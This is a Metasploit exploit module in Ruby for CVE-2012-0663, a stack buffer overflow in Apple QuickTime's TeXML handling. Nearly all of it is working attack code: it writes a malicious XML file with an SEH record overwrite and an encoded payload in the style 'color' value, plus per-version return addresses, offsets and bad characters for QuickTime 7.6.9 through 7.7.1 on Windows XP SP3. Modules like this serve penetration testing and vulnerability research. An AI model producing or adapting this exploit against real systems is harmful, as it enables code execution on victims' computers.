1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 |
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Apple QuickTime TeXML Stack Buffer Overflow', 'Description'=> %q{ This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user.The flaw is generally known as a bug while processing the 'transform' attribute, however, that attack vector seems to only cause a TerminateProcess call due to a corrupt stack cookie, and more data will only trigger a warning about the malformed XML file.This module exploits the 'color' value instead, which accomplishes the same thing. }, 'License'=> MSF_LICENSE, 'Author' => [ 'Alexander Gavrun',# Vulnerability Discovery 'sinn3r',# Metasploit Module 'juan vazquez' # Metasploit Module ], 'References' => [ [ 'OSVDB', '81934' ], [ 'CVE', '2012-0663' ], [ 'BID', '53571' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-095/' ], [ 'URL', 'http://support.apple.com/kb/HT1222' ] ], 'Payload'=> { 'DisableNops' => true, 'BadChars'=> "\x00\x23\x25\x3c\x3e\x7d" }, 'Platform' => 'win', 'Targets'=> [ [ 'QuickTime 7.7.1 on Windows XP SP3', { 'Ret' => 0x66f1bdf8, # POP ESI/POP EDI/RET from QuickTime.qts (7.71.80.42) 'Offset' => 643, 'Max' => 13508 } ], [ 'QuickTime 7.7.0 on Windows XP SP3', { 'Ret' => 0x66F1BD66, # PPR from QuickTime.qts (7.70.80.34) 'Offset' => 643, 'Max' => 13508 } ], [ 'QuickTime 7.6.9 on Windows XP SP3', { 'Ret' => 0x66801042, # PPR from QuickTime.qts (7.69.80.9) 'Offset' => 643, 'Max' => 13508 } ], ], 'Privileged' => false, 'DisclosureDate' => 'May 15 2012')) register_options( [ OptString.new('FILENAME', [ true, 'The file name.','msf.xml']), ], self.class) end def exploit my_payload = rand_text(target['Offset']) my_payload << generate_seh_record(target.ret) my_payload << payload.encoded my_payload << rand_text(target['Max'] - my_payload.length) texml = <<-eos <?xml version="1.0"?> <?quicktime type="application/x-quicktime-texml"?> <text3GTrack trackWidth="176.0" trackHeight="60.0" layer="1" language="eng" timeScale="600" transform="matrix(1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 1, 0, 1.0)"> <sample duration="2400" keyframe="true"> <description format="tx3g" displayFlags="ScrollIn" horizontalJustification="Left" verticalJustification="Top" backgroundColor="0%, 0%, 0%, 100%"> <defaultTextBox x="0" y="0" width="176"height="60"/> <fontTable> <font id="1" name="Times"/> </fontTable> <sharedStyles> <style id="1"> {font-table: 1} {font-size:10} {font-style:normal} {font-weight: normal} {color: #{my_payload}%, 100%, 100%, 100%} </style> </sharedStyles> </description> <sampleData scrollDelay="200" highlightColor="25%, 45%, 65%, 100%" targetEncoding="utf8"> <textBox x="10" y="10" width="156"height="40"/> <text styleID="1">What you need... Metasploit!</text> <highlight startMarker="1" endMarker="2"/> <blink startMarker="3" endMarker="4"/> </sampleData> </sample> </text3GTrack> eos texml = texml.gsub(/^\t\t/,'') print_status("Creating '#{datastore['FILENAME']}'.") file_create(texml) end end |